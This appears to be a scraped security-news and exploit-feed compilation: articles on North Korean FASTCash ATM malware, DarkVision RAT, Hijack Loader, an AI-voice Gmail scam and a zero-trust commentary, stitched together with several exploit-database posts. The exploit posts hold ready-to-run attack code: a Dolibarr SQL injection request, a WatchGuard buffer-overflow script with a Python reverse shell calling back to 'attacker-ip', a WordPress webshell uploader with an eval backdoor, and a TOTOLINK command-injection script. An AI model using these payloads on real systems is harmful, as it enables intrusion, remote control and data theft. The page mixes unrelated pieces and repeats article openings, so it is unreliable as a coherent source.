The thieves modify transaction messages to initiate unauthorized withdrawals, even when there are insufficient funds.

Source: Panther Media GmbH via Alamy Stock Photo

North Korean threat actors are using a Linux variant from a malware family known as "FASTCash" to conduct a financially motivated cyber campaign.

FASTCash is a payment switch malware, first documented by the US government in October 2018 when it was being used by North Korean adversaries in an ATM scheme targeting banks in Africa and Asia.

Since that time, there have been two significant developments within the campaign. The first is its capability to conduct the scheme against banks hosting their switch application on Windows Server, and the second is its expansion of the campaign to target interbank payment processors.

Prior versions of the malware targeted systems running Microsoft Windows and IBM AIX, though the latest findings of the malware now indicate that it is designed to infiltrated Linux systems.

The malware modifies ISO 8583 transaction messages used in debit and credit card transactions to initiate unauthorized withdrawals, even managing to manipulate declined transactions due to insufficient funds, then approve them to withdraw money in Turkish currency ranging from 12,000 to 30,000 lira ($350 to $875).

"The process injection technique employed to intercept the transaction messages should be flagged by any commercial \[endpoint detection and response\] or opensource Linux agent with the appropriate configuration to detect usage of the ptrace system call," noted the researchers in the report.

The researchers also highlight Cybersecurity and Infrastructure Security Agency (CISA) recommendations of implementing chip and PIN requirements for debit cards, requiring and verifying message authentication codes on issue financial request response messages, and performing authorization response cryptogram validation for chip and PIN transactions to prevent exploitation attempts.

**About the Author**

North Korea Hackers Get Cash Fast in Linux Cyber Heists

Cybersecurity researchers have disclosed a new malware campaign that leverages a malware loader named PureCrypter to deliver a commodity remote access trojan (RAT) called DarkVision RAT.
The activity, observed by Zscaler ThreatLabz in July 2024, involves a multi-stage process to deliver the RAT payload.
"DarkVision RAT communicates with its command-and-control (C2) server using a custom network

Cybersecurity researchers have disclosed a new malware campaign that leverages a malware loader named PureCrypter to deliver a commodity remote access trojan (RAT) called DarkVision RAT.

The activity, observed by Zscaler ThreatLabz in July 2024, involves a multi-stage process to deliver the RAT payload.

"DarkVision RAT communicates with its command-and-control (C2) server using a custom network protocol via sockets," security researcher Muhammed Irfan V A said in an analysis.

"DarkVision RAT supports a wide range of commands and plugins that enable additional capabilities such as keylogging, remote access, password theft, audio recording, and screen captures."

PureCrypter, first publicly disclosed in 2022, is an off-the-shelf malware loader that's available for sale on a subscription basis, offering customers the ability to distribute information stealers, RATs, and ransomware.

The exact initial access vector used to deliver PureCrypter and, by extension, DarkVision RAT is not exactly clear, although it paves the way for a .NET executable that's responsible for decrypting and launching the open-source Donut loader.

The Donut loader subsequently proceeds to launch PureCrypter, which ultimately unpacks and loads DarkVision, while also setting up persistence and adding the file paths and process names used by the RAT to the Microsoft Defender Antivirus exclusions list.

Persistence is achieved by setting up scheduled tasks using the ITaskService COM interface, autorun keys, and creating a batch script that contains a command to execute the RAT executable and placing a shortcut to the batch script in the Windows startup folder.

The RAT, which initially surfaced in 2020, is advertised on a clearnet site for as little as $60 for a one-time payment, offering an attractive proposition for threat actors and aspiring cyber criminals with little technical know-how who are looking to mount their own attacks.

Developed in C++ and assembly (aka ASM) for "optimal performance," the RAT comes packed with an extensive set of features that allow for process injection, remote shell, reverse proxy, clipboard manipulation, keylogging, screenshot capture, and cookie and password recovery from web browsers, among others.

It's also designed to gather system information and receive additional plugins sent from a C2 server, augmenting its functionality further and granting the operators complete control over the infected Windows host.

"DarkVision RAT represents a potent and versatile tool for cybercriminals, offering a wide array of malicious capabilities, from keylogging and screen capture to password theft and remote execution," Zscaler said.

"This versatility, combined with its low cost and availability on hack forums and their website, has made DarkVision RAT increasingly popular among attackers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Malware Campaign Uses PureCrypter Loader to Deliver DarkVision RAT

North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign.
The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

North Korean threat actors have been observed using a Linux variant of a known malware family called **FASTCash** to steal funds as part of a financially-motivated campaign.

The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

FASTCash was first documented by the U.S. government in October 2018 as used by adversaries linked to North Korea in connection with an ATM cashout scheme targeting banks in Africa and Asia since at least late 2016.

"FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions," the agencies noted at the time.

"In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries."

While prior FASTCash artifacts have systems running Microsoft Windows (including one spotted as recently as last month) and IBM AIX, the latest findings show that samples designed for infiltrating Linux systems were first submitted to the VirusTotal platform in mid-June 2023.

The malware takes the form of a shared object ("libMyFc.so") that's compiled for Ubuntu Linux 20.04. It's designed to intercept and modify ISO 8583 transaction messages used for debit and credit card processing in order to initiate unauthorized fund withdrawals.

Specifically, it entails manipulating declined (magnetic swipe) transaction messages due to insufficient funds for a predefined list of cardholder account numbers and approving them to withdraw a random amount of funds in Turkish Lira.

The funds withdrawn per fraudulent transaction range from 12,000 to 30,000 Lira ($350 to $875), mirroring a Windows FASTCash artifact ("switch.dll") previously detailed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

"\[The\] discovery of the Linux variant further emphasizes the need for adequate detection capabilities which are often lacking in Linux server environments," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists

Dolibarr version 20.0.1 suffers from a remote SQL injection vulnerability.

## Titles: dolibarr 20.0.1 Multiple security token SQLi## Author: nu11secur1ty## Date: 10/15/2024## Vendor: https://www.dolibarr.org/## Software: https://www.dolibarr.org/downloads.php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `socid` parameter appears to be vulnerable to SQL injection attacks.The attacker can get sensitive information for the MySQL database from thissystem when he attacks it online from inside!He can do this, by using a vulnerable security token to access the webapplication!STATUS: Medium- Vulnerability[+]Exploits:- SQLi Multiple:```POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36Connection: closeCache-Control: max-age=0Cookie:DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5qOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer:http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplierContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129","Chromium";v="129"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 357token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh```[+]Response:```SQLiHTTP/1.1 200 OKDate: Tue, 15 Oct 2024 10:23:43 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINReferrer-Policy: same-originConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 80974<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="author...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-3123:59:59'...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-312...' at line 1<b...[SNIP]... mysqli ...[SNIP]... You have an error in your SQL syntax; check the manual thatcorresponds to your MariaDB server version for the right syntax to use near') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =1...' at line 1<b```## Reproduce:[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html)## Time spent:05:27:00

Dolibarr 20.0.1 SQL Injection

WatchGuard XTM Firebox version 12.5.x suffers from a buffer overflow vulnerability.

=============================================================================================================================================| # Title : WatchGuard XTM Firebox 12.5.x Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.watchguard.com/wgrd-help/documentation/xtm |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 86 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit { private $targetUri; private $lhost; private $lport; private $shell; public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") { $this->targetUri = $targetUri; $this->lhost = $lhost; $this->lport = $lport; $this->shell = $shell; } public function sendRequest($method, $url, $data = null, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if (!empty($headers)) { curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } $response = curl_exec($ch); curl_close($ch); return $response; } public function checkWatchGuardFirebox() { $url = $this->targetUri . '/auth/login'; $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']); if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false && strpos($response, 'Firebox') !== false) { return true; } return false; } public function createBofPayload() { // Generate the buffer overflow payload with Python reverse shell code $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric $pyFilename = "/tmp/" . $randomStr . ".py"; $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>"; $payload .= str_repeat('<BBBBMFA>', 3680); // Include a Python reverse shell command as the payload $payload .= 'import socket;from subprocess import call; from os import dup2;'; $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'; $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));'; $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);'; $payload .= 'call(["' . $this->shell . '","-i"]);'; $payload .= 'import os; os.remove("' . $pyFilename . '");'; return gzencode($payload); // gzip encoding } public function exploit() { if (!$this->checkWatchGuardFirebox()) { echo "Target is not vulnerable.\n"; return; } echo "Target is vulnerable. Sending exploit...\n"; $bofPayload = $this->createBofPayload(); // Send the buffer overflow payload $url = $this->targetUri . '/agent/login'; $this->sendRequest('POST', $url, $bofPayload, [ 'Accept-Encoding: gzip, deflate', 'Content-Encoding: gzip' ]); echo "Payload sent.\n"; }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WatchGuard XTM Firebox 12.5.x Buffer Overflow

Typical AI supported scams are after your Google account by pretending to follow up on account recovery requests

Several reputable sources are warning about a very sophisticated Artificial Intelligence (AI) supported type of scam that is bound to trick a lot of people into compromising their Gmail account.

The most recent warning comes from CEO of Y Combinator Garry Tan who posted on X, saying the scammers using AI voices tell you someone has issued a death certificate for you and is trying to recover your account.

> Public service announcement: You should be aware of a pretty elaborate phishing scam using AI voice that claims to be Google Support (caller ID matches, but is not verified)
> 
> DO NOT CLICK YES ON THIS DIALOG— You will be phished
> 
> They claim to be checking that you are alive and… pic.twitter.com/60zeuS2lL8
> 
> — Garry Tan (@garrytan) October 10, 2024

The scammers claim to be checking that you are alive and whether they should disregard a filed death certificate. If you click “Yes, it’s me” on the fake account recovery screen then you’ll likely lose access to your Google account.

In another recent example, Windows expert Sam Mitrovic was targeted by a very similar AI recovery scam.

He explained how the scam unfolds: It starts when he receives a notification of an alleged Gmail account recovery attempt, followed 40 minutes later by a call. The first time Sam misses the call, but when they try the same thing a week later, Sam answers.

In both cases, the notifications come from the US but the calls show “Google Sydney” as the caller. A polite American voice claims there’s been suspicious activity on Sam’s Gmail account and asks whether Sam was travelling.

The caller says there’s been a login attempt from Germany which raises suspicions, given that Sam is at home in the US. The caller says the login has been successful, and that an attacker has had access to Sam’s account for a week and downloaded account data.

Sam remembers the email and missed call from last week, and has the presence of mind to quickly check the caller ID. It looks like a legitimate Google Assistant number.

But knowing how easy it is to spoof a telephone number and pretend to be calling from that number, Sam asks for an email to confirm that the caller actually works for Google. Some typing against the typical background noises of a call center and soon enough the email arrives.

Image courtesy of Sam Mitrovic

The email looks convincing. It comes from a Google domain, has a case number, claims to be from the Google Account Security Team, and it confirms the phone number and the name the caller is using.

While Sam reviews the email, the caller repeatedly says “Hello”. From the pronunciation and the spacing Sam realizes it’s an AI voice and hangs up.

Inspecting the email Sam found that the scammers are using the legitimate Salesforce CRM (customer relationship management) tool which allows you to set the sender to whatever you like and send over Gmail/Google servers.

Other targets that took the scam a little further,  were asked to verify their 2FA, so it stands to reason that the scammers are looking to take over your Google account, but this time for real.

The need to confirm an account recovery, or a password reset, is a notorious method used in phishing attacks. They usually try to trick the target into opening a fake login portal where they need to enter their credentials to report the request as not initiated by them.

Prompt asking: Is it you trying to recover your account?

**How to stay safe**

There are a few signs you can use to identify this type of scams.

The “To” field of the confirmation email Sam received contains an email address cleverly named GoogleMail\[@\]InternalCaseTracking\[.\] com, which is a non-Google domain.

Google Assistant calls usually come from an automated system and only in some cases, from a manual operator. Google Support on the other hand will not contact you unsolicited.

To verify if a security alert is from Google, users can check their **Recent security activity**:

*   Tap your Gmail profile photo in the top right corner
*   Tap **Manage your Google Account**
*   Select the **Security** tab
*   You will see something similar to this:

Here you can find the Review Security Activity button

Any messages claiming to be security alerts from Google that are not listed there will not be from Google.

Do not entertain these scammers for longer than necessary. It doesn’t take them very long to fingerprint your voice which would allow their AI to impersonate you by using your voice.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Cyrus, powered by Malwarebytes.

 AI scammers target Gmail accounts, say they have your death certificate 

Cybersecurity researchers have disclosed a new malware campaign that delivers Hijack Loader artifacts that are signed with legitimate code-signing certificates.
French cybersecurity company HarfangLab, which detected the activity at the start of the month, said the attack chains aim to deploy an information stealer known as Lumma.
Hijack Loader, also known as DOILoader, IDAT Loader, and

Threat Detection / Malware

Cybersecurity researchers have disclosed a new malware campaign that delivers Hijack Loader artifacts that are signed with legitimate code-signing certificates.

French cybersecurity company HarfangLab, which detected the activity at the start of the month, said the attack chains aim to deploy an information stealer known as Lumma.

Hijack Loader, also known as DOILoader, IDAT Loader, and SHADOWLADDER, first came to light in September 2023. Attack chains involving the malware loader typically involve tricking users into downloading a booby-trapped binary under the guise of pirated software or movies.

Recent variations of these campaigns have been found to direct users to fake CAPTCHA pages that urge site visitors to prove they are human by copying and running an encoded PowerShell command that drops the malicious payload in the form of a ZIP archive.

HarfangLab said it observed three different versions of the PowerShell script starting mid-September 2024 -

*   A PowerShell script that leverages mshta.exe to execute code hosted on a remote server
*   A remotely-hosted PowerShell script that's directly executed via the Invoke-Expression cmdlet (aka iex)
*   A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL

The ZIP archive, for its part, includes a genuine executable that's susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that's to be loaded instead.

"The purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file which is provided in the package," HarfangLab said. "This file conceals the final HijackLoader stage, which is aimed at downloading and executing a stealer implant."

The delivery mechanism is said to have changed from DLL side-loading to using several signed binaries in early October 2024 in an attempt to evade detection by security software.

It's currently not clear if all the code-signing certificates were stolen or intentionally generated by the threat actors themselves, although the cybersecurity firm assessed with low to medium confidence that it could be the latter. The certificates have since been revoked.

"For several issuing certificate authorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and only requires a valid company registration number as well as a contact person," it said. "This research underscores that malware can be signed, highlighting that code signature alone cannot serve as a baseline indicator of trustworthiness."

The development comes as SonicWall Capture Labs warned of a surge in cyber attacks infecting Windows machines with a malware dubbed CoreWarrior.

"This is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses, opening multiple sockets for backdoor access, and hooking Windows UI elements for monitoring," it said.

Phishing campaigns have also been observed delivering a commodity stealer and loader malware known as XWorm by means of a Windows Script File (WSF) that, in turn, downloads and executes a PowerShell script hosted on paste\[.\]ee.

The PowerShell script subsequently launches a Visual Basic Script, which acts as a conduit to execute a series of batch and PowerShell scripts to load a malicious DLL that's responsible for injecting XWorm into a legitimate process ("RegSvcs.exe").

The latest version of XWorm (version 5.6) includes the ability to report response time, collect screenshots, read and modify the victim's host file, perform a denial-of-service (DoS) attack against a target, and remove stored plugins, indicating an attempt to avoid leaving a forensic trail.

"XWorm is a multifaceted tool that can provide a wide range of functions to the attacker," Netskope Threat Labs security researcher Jan Michael Alcantara said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Hijack Loader Malware Using Stolen Code-Signing Certificates

Ultimately, the goal of creating a trusted environment around all digital assets and devices is about modernizing the way you do business.

Alex Simons, Corporate VP, Product Management, Microsoft Identity and Network Access

October 14, 2024

5 Min Read

Source: Brian Jackson via Alamy Stock Photo

COMMENTARY

In today's digital world, threats are around every corner. The technology behind attacks is increasingly sophisticated. Actors include criminal organizations seeking big payouts and nation-states conducting espionage and looking for opportunities to create chaos.  

At the same time, the world continues to transform rapidly around us. With artificial intelligence (AI), we're about to go through the biggest business transformation since the widespread adoption of the Internet, and the bad guys are also exploring how they can use AI for harm.  

In a mobile, cloud-first, AI-driven world, companies must be ready to use world-class technology and processes to protect themselves, their data, and their people, wherever they go.  

Today, those technologies are coalescing around a modern vision for what is, at its heart, one of our most ancient security solutions: our own unique identity. Let's take a look at how a modern version of this ancient solution can help protect our digital lives.  

**Your Castle Walls Have Fallen. What Now? **

Fifteen years ago, the world's security best practice was a "moat-and-castle" model. Organizations kept their most important resources inside their office networks and wrapped a firewall around them.  

As long as their people and resources were inside the wall, everybody could connect to everything as the entire estate was trusted and contained. Your biggest concerns were insider threats or invaders trying to storm your firewall.  

Today, many employees are embracing hybrid and mobile workstyles. We're also adding cloud-scale AI that, by design, is not inside the firewall, while highly mobile workers use VPNs to access applications while outside the network. All this makes the old moat-and-castle security paradigm terribly outdated.  

Additionally, in many ways, companies are becoming cloud services — as their partners, suppliers and customers increasingly interact with them through digital experiences for product discovery, ordering, payment, invoicing, customer service, and customer loyalty programs.  

**Since Data and People Are Always in Transit, Security Should Flow Wherever They Go**

In a world where every organization is a cloud service that needs to securely interact with everybody and everything, companies must ensure that all of their connections are secure and that only the right people, software, devices, and networks are allowed access.  

This is known as a zero-trust model. In a zero-trust environment, every time a user, a device, or a workload wants to access your digital assets and services, they have to prove that they, their software, and the network they're using are all trustworthy. This is why identity plays such an important role in this new security model. By default, all access to everything is closed off until you have a strong proof of the identity and authenticity of the person and of their device. 

Designing, deploying, and running this kind of identity powered zero-trust enterprise environment can be challenging. It requires having a coordinated strategy across multiple teams to design, deploy, and run a security solution that brings together user and workload accounts, device management, device protection, network state, and an inventory of digital resources and permissions, and enables the enforcement of adaptive, granular access policies across the enterprises entire digital estate. 

**Identity: Even More Important in the Era of AI **

If your organization doesn't have this kind of identity-centric zero-trust model in place today, moving to an AI future is going to be risky and challenging. When you deploy a large language model (LLM) assistant, it becomes incredibly easy for employees to find content from across all your  documents and files, even the ones you didn’t know they had rights to access.  

And that also means an intruder could use the AI assistant to run queries for assets that they never should be able to find. Where organizations used to have the benefit of obscure file hierarchies to waste an attacker's time, today's super-smart AI engines make it incredibly easy to quickly find information anywhere it's stored.  

The solution is something called "workload identities." A workload identity is the identity your software systems use to get things done. Having your co-pilot or your LLM use a workload identity with well-managed permissions means that it can only get to the specific documents and files you allow it to access, which enables you to govern and secure the LLM's access just like you would for any user.  

**Modern Security Benefits Everyone**

Ultimately, creating a trusted environment can modernize the way you do business. Now, employees can work from anywhere. The company can hire talent it wouldn't have access to before. The company can work directly with customers and suppliers digitally. And you can do all that in a world of cloud, AI, and mobile resources that can easily scale up and down.  

Employees, partners, and customers all get a seamless experience on the devices they choose, wherever they want to work. And chief information security officers (CISOs) can be confident that it's happening with security omnipresent.  

And it's all made possible by focusing on the oldest access solution of all — your own unique identity.  

**About the Author**

Corporate VP, Product Management, Microsoft Identity and Network Access

Alex Simons is corporate vice president, product management, Microsoft Identity and Network Access Division. He is responsible for driving the vision and strategy, product roadmap, and feature design of the Microsoft Entra Suite. He prides himself on being deeply connected to customers and has direct relationships with many of Microsoft’s largest enterprise customers. In addition to managing his own team, Alex is responsible for partnering with teams across Office, Windows, Azure, Visual Studio, Dynamics, Xbox, and LinkedIn to deliver world-class identity experiences and security and compliance controls.

Why Your Identity Is the Key to Modernizing Cybersecurity

WordPress File Manager Advanced Shortcode plugin version 2.3.2 suffers from a code injection vulnerability that allows for remote shell upload.

=============================================================================================================================================| # Title : WordPress File Manager Advanced Shortcode 2.3.2 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 106 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass MetasploitModule { private $targetUri; private $webshellName; private $wpData; private $uploadPath; private $postParam; private $getParam; public function __construct($targetUri, $webshell = null, $command = 'passthru') { $this->targetUri = $targetUri; $this->webshellName = $webshell ?: $this->generateRandomWebshellName(); $this->postParam = $this->generateRandomString(); $this->getParam = $this->generateRandomString(); } private function generateRandomWebshellName() { return bin2hex(random_bytes(rand(8, 16))) . '.php'; } private function generateRandomString($length = 8) { return bin2hex(random_bytes($length)); } private function getFormData($pngWebshell) { // Construct multipart form data $boundary = md5(time()); $formData = "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"_fmakey\"\r\n\r\n{$this->wpData['fmakey']}\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"path\"\r\n\r\n{$this->uploadPath}\r\n"; $formData .= "--$boundary\r\n"; $formData .= "Content-Disposition: form-data; name=\"upload[]\"; filename=\"{$this->webshellName}\"\r\n"; $formData .= "Content-Type: image/png, text/x-php\r\n\r\n" . $pngWebshell . "\r\n"; $formData .= "--$boundary--\r\n"; return ['data' => $formData, 'boundary' => $boundary]; } private function uploadWebshell($pngWebshell) { $formData = $this->getFormData($pngWebshell); $response = $this->sendRequest('POST', "/wp-admin/admin-ajax.php", $formData['data'], [ "Content-Type: multipart/form-data; boundary={$formData['boundary']}" ]); // Handle response and check for upload success $responseData = json_decode($response, true); if (isset($responseData['added'][0]['name']) && $responseData['added'][0]['name'] == $this->webshellName) { return true; } return false; } private function injectPhpPayloadPng($payload) { // Here you should inject PHP code into a PNG file // This is just a placeholder for the actual implementation return $payload; // Placeholder for the injected PNG } private function executeCommand($cmd) { $payload = base64_encode($cmd); $this->sendRequest('POST', "/{$this->wpData['baseurl']}/{$this->uploadPath}/{$this->webshellName}", [ $this->getParam => 'passthru', // replace with the command function $this->postParam => $payload ]); } private function sendRequest($method, $uri, $data, $headers = []) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->targetUri . $uri); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); if ($method == 'POST') { curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); curl_close($ch); return $response; } public function exploit() { // Check for vulnerabilities and upload webshell logic $payload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>"; $pngWebshell = $this->injectPhpPayloadPng($payload); if ($this->uploadWebshell($pngWebshell)) { $this->executeCommand('whoami'); // Replace 'whoami' with your desired command } else { echo "Failed to upload webshell."; } }}// Usage example$exploit = new MetasploitModule('http://target-uri.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress File Manager Advanced Shortcode 2.3.2 Code Injectin / Shell Upload

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

============================================================================================================================================= 
| # Title : TOTOLINK 9.x Code Injection Vulnerability | 
| # Author : indoushka | 
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | 
| # Vendor : https://www.totolink.net/ | 
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit { 
 private $targetUri; 
 private $sleepTime;

 public function __construct($targetUri, $sleepTime = 3) { 
 $this->targetUri = $targetUri; 
 $this->sleepTime = $sleepTime; 
 }

 // Function to send POST request and execute the command on the target 
 public function executeCommand($cmd) { 
 $num = rand(1, 500); 
 $url = $this->targetUri . '/cgi-bin/cstecgi.cgi'; 
 $data = json_encode([ 
 "command" => "127.0.0.1; {$cmd};#", 
 "num" => $num, 
 "topicurl" => "setTracerouteCfg" 
 ]);

 // Send POST request 
 return $this->sendPostRequest($url, $data); 
 }

 // Check if the target is vulnerable 
 public function check() { 
 echo "Checking if the target can be exploited.\n";

 // Test using echo command to see if it's vulnerable 
 $response = $this->executeCommand("echo test"); 
 if (!$response || strpos($response, 'success') === false) { 
 return "Target is likely not vulnerable.\n"; 
 }

 // Test command injection using sleep 
 echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n"; 
 $start = microtime(true); 
 $this->executeCommand("sleep {$this->sleepTime}"); 
 $elapsedTime = microtime(true) - $start;

 echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n"; 
 if ($elapsedTime >= $this->sleepTime) { 
 return "Target is vulnerable: Blind command injection successful.\n"; 
 }

 return "Command injection test failed.\n"; 
 }

 // Exploit the vulnerability to run the payload 
 public function exploit($payload) { 
 echo "Executing payload on the target.\n"; 
 $this->executeCommand($payload); 
 }

 // Helper function to send POST requests 
 private function sendPostRequest($url, $postFields) { 
 $options = [ 
 'http' => [ 
 'method' => 'POST', 
 'header' => 'Content-Type: application/x-www-form-urlencoded', 
 'content' => $postFields 
 ] 
 ]; 
 $context = stream_context_create($options); 
 return file_get_contents($url, false, $context); 
 } 
}

// Example of usage 
